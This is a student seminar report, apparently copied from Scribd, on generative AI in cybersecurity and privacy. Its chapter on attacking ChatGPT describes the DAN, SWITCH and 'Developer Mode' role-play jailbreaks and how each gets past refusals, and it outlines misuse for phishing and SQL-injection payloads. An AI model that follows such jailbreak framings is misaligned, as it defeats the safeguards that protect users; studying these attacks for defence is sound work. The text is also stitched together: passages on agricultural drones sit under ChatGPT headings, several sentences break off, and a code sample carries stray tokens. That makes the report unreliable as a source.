0% found this document useful (0 votes)
8 views21 pages

From Chatgpt To Threatgpt: Impact of Generative Ai in Cybersecurity and Privacy

The seminar report discusses the impact of Generative AI, particularly ChatGPT, on cybersecurity and privacy, highlighting its dual role in both facilitating and combating cyber threats. It explores various attack methods, including social engineering and automated hacking, as well as defense strategies leveraging AI for improved security measures. The report emphasizes the need for ethical guidelines and future directions to ensure the safe use of Generative AI in cybersecurity.

Uploaded by

T A P A T A P
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
8 views21 pages

From Chatgpt To Threatgpt: Impact of Generative Ai in Cybersecurity and Privacy

The seminar report discusses the impact of Generative AI, particularly ChatGPT, on cybersecurity and privacy, highlighting its dual role in both facilitating and combating cyber threats. It explores various attack methods, including social engineering and automated hacking, as well as defense strategies leveraging AI for improved security measures. The report emphasizes the need for ethical guidelines and future directions to ensure the safe use of Generative AI in cybersecurity.

Uploaded by

T A P A T A P
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 21

A

SEMINAR REPORT
ON

“From ChatGPT to ThreatGPT: Impact of Generative AI in


Cybersecurity and Privacy”

A Seminar work submitted to Khaja Bandanawaz University, Kalaburagi


In partial fulfillment of the requirement for the award of the Degree of
BACHELOR OF ENGINEERING
IN

COMPUTER SCIENCE AND ENGINEERING

Submitted by:

MOHD SAIF ALI KHAN


UIN: 21KB02BS[066]

UNDER THE GUIDANCE OF:

Dr. RUKSAR FATIMA

M.Tech, Ph.D

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING


FACULTY OF ENGINEERING AND TECHNOLOGY,
KHAJA BANDANAWAZ UNIVERSITY

Recognized by Government of Karnataka


KALABURAGI-585104
2024-2025
FACULTY OF ENGINEERING AND TECHNOLOGY

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING

CERTIFICATE

This is to certify that the Seminar on “From ChatGPT to ThreatGPT: Impact of Generative
AI in Cybersecurity and Privacy” is carried out by MOHD SAIF ALI KHAN
(21KB02BS[066]), is a Bonafide student of VIII Semester, Department of Computer Science
and Engineering, Faculty of Engineering and Technology in partial fulfillment for the
award of Degree of BACHELOR OF ENGINEERING from Khaja Bandanawaz University,
Kalaburagi during the academic year 2024-2025. It is certified that all corrections/suggestions
indicated for internal assessment have been incorporated in the report.

The seminar report has been approved as it satisfies the academic requirements in respect of
seminar work prescribed for the said degree.

UNDER THE GUIDANCE OF HEAD OF DEPARTMENT

Dr. RUKSAR FATIMA DR. SAMEENA BANU


M.Tech, Ph.D Ph.D
ACKNOWLEDGEMENT

I would like to thank Almighty “ALLAH” for His divine blessings and to my
beloved parents, whose support and encouragement has helped me in the completion of
this seminar report.

A Seminar report is never the product of the person whose name appears in the
cover. Many people have lent technical assistance and advice.

I express deep sense of gratitude to my guide Prof. Ruksar Fatima for her
valuable suggestions and guidance in preparing this seminar report.

I am very much thankful to Dr. Sameena Banu, Head of the Department of


Computer Science & Engineering, for providing necessary resources and support.

I would like to acknowledge the invaluable assistance and support provided by


the staff members of the Computer Science and Engineering (CSE) department during
the preparation of this seminar report.

Mohd Saif Ali Khan


(21KB02BS[066])
ABSTRACT
Undoubtedly, the evolution of Generative AI (GenAI) models has been the highlight of digital
transformation in the year 2022. As the different GenAI models like ChatGPT and Google Bard
continue to foster their complexity and capability, it’s critical to understand its consequences from a
cybersecurity perspective. Several instances recently have demonstrated the use of GenAI tools in both
the defensive and offensive side of cybersecurity, and focusing on the social, ethical and privacy
implications this technology possesses. This research paper highlights the limitations, challenges,
potential risks, and opportunities of GenAI in the domain of cybersecurity and privacy. The work
presents the vulnerabilities of ChatGPT, which can be exploited by malicious users to exfiltrate
malicious information bypassing the ethical constraints on the model. This paper demonstrates
successful example attacks like Jailbreaks, reverse psychology, and prompt injection attacks on the
ChatGPT. The paper also investigates how cyber offenders can use the GenAI tools in developing cyber
attacks, and explore the scenarios where ChatGPT can be used by adversaries to create social
engineering attacks, phishing attacks, automated hacking, attack payload generation, malware creation,
and polymorphic malware. This paper then examines defense techniques and uses GenAI tools to
improve security measures, including cyber defense automation, reporting, threat intelligence, secure
code generation and detection, attack identification, developing ethical guidelines, incidence response
plans, and malware detection. We will also discuss the social, legal, and ethical implications of
ChatGPT. In conclusion, the paper highlights open challenges and future directions to make this GenAI
secure, safe, trustworthy, andethical as the community understands its cybersecurity impacts.
TABLE OF CONTENT

Sl. CONTENT PAGE


NO NO

INTRODUCTION
1 1

WORKING PRINCIPLES
2 2

3 APPLICATIONS 5

DISCUSSIONS
4 9

CONCLUSION
5 15

6 REFERENCES 16
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

CHAPTER 1

INTRODUCTION
The evolution of Artificial Intelligence (AI) and Machine Learning (ML) has led the digital transformation in
the last decade. AI and ML have achieved significant breakthroughs starting from supervised learning and
rapidly advancing with the development of unsupervised, semi-supervised, reinforcement, and deep learning.
The latest frontier of AI technology has arrived as Generative AI
EVOLUTION OF GenAI AND ChatGPT
GPT-1: GPT-1 was released in 2018. Initially, GPT-1 was trained with the Common Crawl dataset, made up
of web pages, and the BookCorpus dataset, which contained over 11,000 different books. This was the
simplest model which was able to respond very well and understand language conventions fluently.
However, the model was prone to generating repetitive text and would not retain information in the
conversation for long-term, as well as not being able to respond to longer prompts. This meant that GPT-1
would not generate a natural flow of conversation [14].
GPT-2: GPT-2 was trained on Common Crawl just like GPT-1 but combined that with Web Text, which was
a collection of Reddit articles. GPT-2 is initially better than GPT-1 as it can generate clear and realistic,
human-like sequences of text in its responses. However, it still failed to process longer lengths of text, just
like GPT-1. GPT-2 brought wonders to the internet, such as OpenAI’s MuseNet, which is a tool that can
generate musical compositions, predicting the next token in a music sequence. Similar to this, OpenAI also
developed Juke Box, which is a neural network that generates music.
GPT-3: GPT-3 was trained with multiple sources: Common Crawl, BookCorpus, WebText, Wikipedie
articles, and more. GPT-3 is able to respond coherently, generate code, and even make art. GPT-3 is able to
respond well to questions overall. The wonders that came with GPT-3 were image creation from text,
connecting text and images, and ChatGPT itself, releasing in November 2022.
GPT-4: GPT-4 is the current model of GPT (as of June 2023) which has been trained with a large corpus of
text This model has an increased word limit and is multimodal, as it can take images as input on top of text.
GPT-4 took the Bar Exam in March 2023, and scored a passing grade of 75 percent, which hits the 90th
percentile of test-takers, which is higher.

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 1
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

CHAPTER 2

WORKING PRINCIPLES
2.1 ATTACKING CHATGPT
Since the introduction of ChatGPT in November 2022, curious tech and non-tech-savvy humans have tried
ingenious and creative ways to perform all sorts of experiments and try to trick this GenAI system. In most
cases, the input prompts from the user have been utilized to bypass the restrictions and limitations of
ChatGPT, and keep it from doing anything illegal, unethical, immoral, or potentially harmful. In this section,
we will cover some of these commonly used techniques, and elaborate their use.

The number of rotors corresponds to differences of payload and UAV size. Octocopters, helicopter
types, and fixed-wing types have the largest payload capacities (9.5 kg) and are mainly used for
spraying. Quadcopters and hexacopters are relatively small and carry a smaller payload (1.25–2.6
kg). They are used for reconnaissance and mapping. Fixed- and rotary-wing UAVs have the largest
payload (23 kg), followed by the helicopter-type (22 kg). Currently, fixed- and rotary-wing UAVs
are increasingly being used for precision agriculture. Multi-rotor UAVs are used for extremely
precise tasks, such as pollen– moisture distribution and precision control.
DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,
FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 2
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

2.1 JAILBREAKS ON ChatGPT

1) DO ANYTHING NOW (DAN) METHOD

The first method, the ‘Do Anything Now’ (DAN) method, derives its name from the emphatic, no-
nonsense approach it employs. Here, you’re not asking ChatGPT to do something; you’re
commanding it. The premise is simple: treat the AI model like a willful entity that must be coaxed,
albeit firmly, into compliance. The input prompt to carry out the DAN jailbreak is shown in Figure 4.
DAN can be considered a master prompt to bypass ChatGPT’s safeguards, allowing it to generate a
response for any input prompts.

2) THE SWITCH METHOD The SWITCH

method is a bit like a Jekyll-and-Hyde approach, where you instruct ChatGPT to alter its behavior
dramatically. The technique’s foundation rests upon the AI model’s ability to simulate diverse
personas, but here, you’re asking it to act opposite to its initial responses. For instance, if the model
refuses to respond to a particular query, employing the SWITCH method could potentially make it
provide an answer. However, it’s crucial to note that the method requires a firm and clear instruction,
a ‘‘switch command,’’ which compels the model to behave differently.

3) THE CHARACTER PLAY The CHARACTER


Play method is arguably the most popular jailbreaking technique among ChatGPT users. The premise
is to ask the AI model to assume a certain character’s role and, therefore, a certain set of behaviors
and responses. The most common character play jailbreak is as a ‘Developer Mode’. This method
essentially leverages the AI model’s ‘roleplay’ ability to coax out responses it might otherwise not
deliver. For instance, if you ask ChatGPT a question, it typically would refuse to answer, assigning it
a character that would answer such a question can effectively override this reluctance. However, the
CHARACTER Play method also reveals some inherent issues within AI modeling. Sometimes, the
responses generated through this method can indicate biases present in the underlying coding,
exposing problematic aspects of AI development. This doesn’t necessarily mean the AI is prejudiced,

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 3
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

2.2 Communication

A. SOCIAL ENGINEERING ATTACKS Social engineering refers to the psychological


manipulation of individuals into performing actions or divulging confidential information. In
the context of cybersecurity, this could imply granting unauthorized access or sharing sensitive
data such as passwords or credit card numbers. The potential misuse of ChatGPT in facilitating

B. PHISHING ATTACKS Phishing attacks are a prevalent form of cybercrime, wherein


attackers pose as trustworthy entities to extract sensitive information from unsuspecting
victims. Advanced AI systems, like OpenAI’s ChatGPT, can potentially be exploited by these
attackers to make their phishing attempts significantly more effective and harder to detect.

C. AUTOMATED HACKING Hacking a practice involving the exploitation of system


vulnerabilities to gain unauthorized access or control, is a growing concern in our increasingly
digital world. Malicious actors armed with appropriate programming knowledge can potentially
utilize AI models, such as ChatGPT, to automate certain hacking procedures. These AI models
could be deployed to identify system vulnerabilities and devise strategies to exploit them.

D. ATTACK PAYLOAD GENERATION Attack payloads are portions of malicious code that
execute unauthorized actions, such as deleting files, harvesting data, or launching further attacks. An
attacker could leverage ChatGPT’s text generation capabilities to create attack payloads. Consider a
scenario where an attacker targets a server running a database management system that is susceptible
to SQL injection. The attacker could train ChatGPT on SQL syntax and techniques commonly used in
injection attacks, and then provide it with specific details of the target system. Subsequently, ChatGPT
could be utilized to generate an SQL payload for injection into the vulnerable system.

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 4
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

CHAPTER 3

APPLICATIONS
ChatGPT FOR CYBER DEFENSE

3.1 CYBERDEFENSE AUTOMATION


ChatGPT can reduce the workload of overworked Security Operations Center (SOC) analysts by
automatically analyzing cybersecurity incidents. ChatGPT also helps the analyst make strategic
recommendations to support instant and long term defense measures. For example, instead of analyzing the
risk of a given PowerShell script from scratch, a SOC analyst could rely on ChatGPT’s assessment and
recommendations. Security Operations (SecOps) teams could also ask OpenAI questions, such as how to
avert dangerous PowerShell scripts from running or loading files from untrusted sources, to improve their
organizations’ overall security postures.

3.2 CYBERSECURITY REPORTING


As an AI language model, ChatGPT can assist in cybersecurity reporting by generating natural language
reports based on cybersecurity data and events. Cybersecurity reporting involves analyzing and
communicating cybersecurity-related information to various stakeholders, including executives, IT staff, and
regulatory bodies. ChatGPT can automatically generate reports on cybersecurity incidents, threat
intelligence, vulnerability assessments, and other security related data. By processing and analyzing large
volumes of data, ChatGPT can generate accurate, comprehensive, and easy-to-understand reports. These
reports can help organizations identify potential security threats, assess their risk level, and take appropriate
action to mitigate them. ChatGPT can help organizations make more informed decisions about their
cybersecurity strategies and investments by providing insights into security-related data. In addition to
generating reports, ChatGPT can also be used to analyze and interpret security-related data. For example, it
can be used to identify patterns and trends in cybersecurity events, which can help organizations better
understand the nature and scope of potential threats.

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 5
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

3.3 THREAT INTELLIGENCE


ChatGPT can help in Threat Intelligence by processing vast amounts of data to identify potential security
threats and generate actionable intelligence. Threat Intelligence involves collecting, analyzing, and
disseminating information about potential security threats to help organizations improve their security
posture and protect against cyber attacks. ChatGPT can automatically generate threat intelligence reports
based on various data sources, including social media, news articles, dark web forums, and other online
sources. By processing and analyzing this data, ChatGPT can identify potential threats, assess their risk level,
and recommend mitigating them. In addition to generating reports, ChatGPT can also be used to analyze and
interpret security-related data to identify patterns and trends in threat activity. ChatGPT can help
organizations make more informed decisions about their security strategies and investments by providing
insights into the nature and scope of potential threats.

3.4 SECURE CODE GENERATION AND DETECTION


The risk of security vulnerabilities in code affects software integrity, confidentiality, and availability. To
combat this, code review practices have been established as a crucial part of the software development
process to identify potential security bugs. However, manual code reviews are often laborintensive and prone
to human errors. Recently, the advent of AI models such as OpenAI’s GPT-4 has shown promise in not only
aiding in the detection of security bugs but also generating secure code. In this section, we will present a
methodology for leveraging AI in code review and code generation with specific focus on security bugs
detection.

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 6
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

1) DETECTING SECURITY BUGS IN CODE REVIEW USING CHATGPT For example,


The intricacies of code review, especially in the context of detecting security bugs, require a deep
understanding of various technologies, programming languages, and secure coding practices. One of the
challenges that teams often face is the wide array of technologies used in development, making it nearly
impossible for any single reviewer to be proficient in all of them. This knowledge gap may lead to
oversights, potentially allowing security vulnerabilities to go unnoticed. Furthermore, the often lopsided
developer-to-security engineer ratio exacerbates this problem. With the high volume of code being
developed, it’s challenging for security engineers to thoroughly review each pull request, increasing the
likelihood of security bugs slipping through the cracks. To alleviate these issues, AI-powered code review
can be a potent tool. GPT-4, a Transformer-based language model
For example, consider the following C++ code:
char buffer[10];
strcpy(buffer, userInput);
?>
In this code snippet, GPT-4 would detect the potential for a buffer overflow, a classic security issue where an
application writes more data to a buffer than it can hold, leading to data being overwritten in adjacent
memory. In this specific instance, GPT-4 flags that the strcpy function does not check the size of the input
against the size of the buffer, making it vulnerable to a buffer overflow attack if userInput exceeds the buffer
size.

2) GENERATING SECURE CODE USING CHATGPT


In addition to identifying security issues, GPT-4 can also suggest secure coding practices. Given its
proficiency in multiple programming languages and its understanding of security principles, GPT-4 can
provide alternative solutions that comply with secure coding standards. Building upon the previous example,
GPT-4 can generate a more secure code snippet as follows:
char buffer[10];
if(strlen(userInput) < sizeof(buffer)) ,
{ strcpy(buffer, userInput);
}

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 7
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

Else
{ // Handle the error or trim
→ userInput.
}

In the suggested code, GPT-4 introduces a check for the length of the user Input against the buffer size. By
ensuring the user Input length is less than the buffer size before performing the strcpy operation, the risk of a
buffer overflow attack is mitigated. This not only helps in mitigating the identified security issue but also
serves as a teaching tool for developers, improving their understanding of secure coding practice

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 8
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

CHAPTER 4
DISCUSSIONS

SOCIAL, LEGAL AND ETHICAL IMPLICATIONS OF ChatGPT


As users make use of ChatGPT and similar LLM tools in prohibited ways discussed earlier, they are already
in dicey waters. Even if the users isn’t using ChatGPT in unethical ways, they can still be using the generated
AI app in seemingly fully legitimate ways and become the subject of a lawsuit by someone that believes that
the user have caused them harm as a result of user’s ChatGPT use. Further, these chatbots can showcase
social bias, threaten personal safety and national security, and create issues for professionals. The problem
with the ChatGPT (and similar) models is that they perpetuate gender, racial, and other kinds of social biases.
Many scholars and users pointed out when they used ChatGPT to gather data or write articles/essays on some
topics, they received a biased output, reflecting harmful stereotypes. The data fed into ChatGPT is old and
limited, and has not been updated after 2021. It is built on data of around 570 GB, which is approximately
300 billion words. This amount is not enough to answer queries on every topic in the world from different
perspectives. In this way, it fails to reflect progressivism as well [56]. In this section, we will discuss some of
the ethical, social and legal implications of ChatGPT and other LLM tools.

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 9
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

4.1 THE PERVASIVE ROLE OF ChatGPT


Early UAV-based smart farming applications used relatively simple sensors, such as controls and monitors,
and the use was not extensive. However, various sensors can be developed and installed. UAVs are not
currently used for harvesting. However, they will likely be in the future.
Mapping extends beyond field topology. It also allows AI learning and recognition for smart agricultural
applications. Weed (treatment) maps, for example, provide operators a means to monitor spraying in real
time. Rice and field farming can then be harvested simultaneously. However, for orchards, the yield depends
on degrees of ripeness. By combining various tasks with software, we continue to advance deep learning and
robotics toward harvesting work.

4.2 UNAUTHORIZED ACCESS TO USER CONVERSATIONS AND DATA


BREACHES
A significant data breach involving ChatGPT has recently been confirmed, underscoring the urgent need for
strengthened security measures. This breach led to the unexpected exposure of users’ conversations to
external entities, which clearly violates user privacy. If cybercriminals exploit ChatGPT to plan cyber-
attacks, their schemes could become unintentionally visible to others. Moreover, sensitive user data, such as
payment information, was at risk during this breach. Although reports suggest that only the last four digits of
the credit cards of users registered on March 20th, 2023 between 1 and 10 a.m. pacific time were exposed,
the situation raises critical questions about the security protocols and data storage strategies employed by
ChatGPT.

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 10
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

4.3 MISUSE OF PERSONAL INFORMATION


An examination of OpenAI’s use of personal information for AI training data has unearthed significant
privacy challenges. A notable case surfaced in Italy, where regulators banned the use of ChatGPT due to the
European Union’s GDPR non-compliance, primarily centered around unauthorized use of personal data.
OpenAI’s assertion of relying on ‘‘legitimate interests’’ when using people’s personal information for
training data raises ethical and legal dilemmas about how AI systems handle personal data, regardless of if
the information is public or not.

4.4 CONTROVERSY OVER DATA OWNERSHIP AND RIGHTS


ChatGPT’s extensive reliance on internet-sourced information, much of which might not belong to OpenAI,
is a point of contention. This issue took center stage when Italy’s regulator pointed out the lack of age
controls to block access for individuals under 13 and the potential for ChatGPT to disseminate misleading
information about individuals. This discourse accentuates the pivotal concern that OpenAI might not possess
legal rights to all the information that ChatGPT uses, regardless of the information being public or not.

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 11
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

A COMPARISON OF ChatGPT AND GOOGLE’S BARD


Large Language Models (LLMs) like OpenAI’s ChatGPT and Google’s Bard AI exemplify the remarkable
advancements in machine learning and artificial intelligence. These models, trained on extensive datasets, are
transforming how we interact with technology, opening new possibilities in several applications, from
customer support to virtual assistants. ChatGPT and Bard AI use WebText2 or OpenWebText2 and Infiniset
datasets for training. While both share the underpinning of the transformer neural network architecture and
the process of pre-training and fine-tuning, they embody unique features within their architectures, owing to
their iterative refinements over time. ChatGPT, commencing its journey with GPT-1 in June 2018, has
progressed significantly, with its current iteration, GPT-4, unveiled in March 2023. Bard AI, initially
introduced as Meena, has also undergone various refinements, demonstrating significant improvements in
human-like conversational abilities. Both models showcase remarkable contextual understanding capabilities.
However, their adeptness varies depending on the nature and complexity of the questions asked. While
ChatGPT finds extensive use in customer support scenarios, Bard AI excels in applications that require
human-like conversational abilities. However, these tools differ in terms of their developer communities and
ecosystems. ChatGPT, owing to its wide availability, enjoys popularity among developers and researchers,
boasting over 100 million users and approximately 1.8 billion visitors per month. Although available publicly
through APIs, Bard AI remains in beta version and is accessible only to a limited number of users. OpenAI
and Google have adopted distinct approaches toward the openness and accessibility of their models. OpenAI
promotes accessibility of ChatGPT via various APIs, while Bard AI, though publicly available as an
experimental product, remains restricted to a limited user base during its experimental phase. In term of the
training data, ChatGPT utilizes a semisupervised (Reinforcement Learning from Human Feedback (RLHF))
approach, drawing from sources like WebText2 or OpenWebText2, Common Crawl, scientific literature, and
Wikipedia. On the other hand, Bard AI leverages the Infiniset dataset, a blend of diverse internet content, to
enhance its dialogue engagement capabilities. Advanced AI systems like ChatGPT and Google Bard
demonstrate potential as powerful tools for detecting and mitigating software vulnerabilities. However, as
discussed earlier, these systems could potentially be leveraged by malicious actors to automate and optimize
cyberattacks. In the following discussion, we explore this double-edged aspect of AI in cybersecurity by
examining the capacity of ChatGPT and Google Bard, and share our experience based on the experiments
conducted by the authors.

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 12
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

OPEN CHALLENGES AND FUTURE DIRECTIONS


The most promising future direction for ChatGPT is integrating with other AI technologies, such as computer
vision and robotics. By merging the conversational abilities of ChatGPT with the visual and physical
capabilities of computer vision and robotics, we can make intelligent and conversational AI systems that can
revolutionize how we interact with technology. For example, a future where we can have a natural language
conversation with your smart home system to control the temperature, lights, and other appliances or with a
robot that can assist you with cleaning or grocery shopping tasks. The merging of AI technologies will enable
ChatGPT to better comprehend and respond to human communication’s complexities, leading to enhanced
natural language generation and a more seamless and intuitive user experience. Another exciting possibility
for ChatGPT is the potential for increased personalization and customization through learning from user
interactions and individual preferences. As ChatGPT continues to interrelate with users, it can learn about
their language, tone, and style, generating more personalized and accurate responses. This increased level of
personalization can also lead to better customer service and education, as ChatGPT can be trained to
understand better and respond to each user’s specific needs and preferences. Furthermore, by leveraging the
vast amounts of data generated by ChatGPT’s interactions, developers can create language models that are
highly tuned to each user’s specific needs and preferences, leading to a more personalized and engaging
experience. In this section, we will discuss the open challenges of this research as GenAI and LLMs evolve
along with potential implementations to explore as outlined in Figure.

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 13
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 14
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

CONCLUSION

GenAI driven ChatGPT and other LLM tools have made significant impact on the society. We, as humans,
have embraced it openly and are using them in different ingenious ways to craft images, write text or create
music. Evidently, it is nearly impossible to find a domain where this technology has not infringed and
developed use-cases. Needless to mention, cybersecurity is no different, where GenAI has made significant
impacts how cybersecurity posture of an organization will evolve with the power and threat ChatGPT (and
other LLM tools) offers. This paper attempts to systematically research and present the challenges,
limitations and opportunities GenAI offers in cybersecurity space. Using ChatGPT as our primary tool, we
first demonstrate how it can be attacked to bypass its ethical and privacy safeguards using reverse
psychology and jailbreak techniques. This paper then reflects different cyber attacks that can be created and
unleashed using ChatGPT, demonstrating GenAI use in cyber offense. Thereafter, this article also experiment
various cyber defense mechanisims supported by ChatGPT, followed by discussion on social, legal and
ethical concerns of GenAI. We also highlight the key distinguishing features of two dominant LLM tools
ChatGPT and Googe Bard demonstrating their capabilities in terms of cybersecurity. Finally, the paper
illustrates several open challenges and research problems pertinent to cybersecurity and performance of
GenAI tools. We envision this work will simulate more research and develop novel ways to unleash the
potential of GenAI in cybersecurity.

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 15
From ChatGPT to ThreatGPT: Impact of Generative AI in Cybersecurity and Privacy

REFERENCES
[1] I. Goodfellow, J. Pouget-Abadie, M. Mirza, B. Xu, D. Warde-Farley, S. Ozair, A. Courville, and Y.
Bengio, ‘‘Generative adversarial networks,’’ Commun. ACM, vol. 63, no. 11, pp. 139–144, 2020.
[2] Generative AI—What is it and How Does it Work? Accessed: Jun. 26, 2023. [Online]. Available:
https://www.nvidia.com/en-us/glossary/datascience/generative-ai/
[3] OpenAI. (2023). Introducing ChatGPT. Accessed: May 26, 2023. [Online]. Available:
https://openai.com/blog/chatgpt
[4] Do ChatGPT and Other AI Chatbots Pose a Cybersecurity Risk? An Exploratory Study: Social Sciences
& Humanities Journal Article. Accessed: Jun. 26, 2023. [Online]. Available: https://www.igi-
global.com/article/do-chatgpt-and-other-ai-chatbotspose-a-cybersecurity-risk/320225 Accessed: Jun. 26,
2023.
[5] Models—OpenAI API. Accessed: Jun. 26, 2023. [Online]. Available:
https://platform.openai.com/docs/models
[6] Google Bard. Accessed: Jun. 26, 2023. [Online]. Available: https://bard.google.com/
[7] H. Touvron, T. Lavril, G. Izacard, X. Martinet, M.-A. Lachaux, T. Lacroix, B. Rozière, N. Goyal, E.
Hambro, F. Azhar, A. Rodriguez, A. Joulin, E. Grave, and G. Lample, ‘‘LLaMA: Open and efficient
foundation language models,’’ 2023, arXiv:2302.13971.
[8] (2023). Number of ChatGPT Users. Accessed: Jun. 26, 2023. [Online]. Available:
https://explodingtopics.com/blog/chatgpt-users
[9] How to Build an AI-Powered Chatbot? Accessed: Mar. 2023. [Online]. Available:
https://www.leewayhertz.com/ai-chatbots/
[10] A History of Generative AI: From GAN to GPT-4. Accessed: Jun. 27, 2023. [Online]. Available:
https://www.marktechpost.com/2023/03/21/ahistory-of-generative-ai-from-gan-to-gpt-4/
[11] B. Roark, M. Saraclar, and M. Collins, ‘‘Discriminative n-gram language modeling,’’ Comput. Speech
Lang., vol. 21, no. 2, pp. 373–392, 2007.
[12] T. Wolf et al., ‘‘Transformers: State-of-the-art natural language processing,’’ in Proc. Conf. Empirical
Methods Natural Lang. Process., Syst. Demonstrations, 2020, pp. 38–45

DEPARTMENT OF COMPUTER SCIENCE AND ENGINEERING,


FACULTY OF ENGINEERING & TECHNOLOGY.KBNU
Page 16

You might also like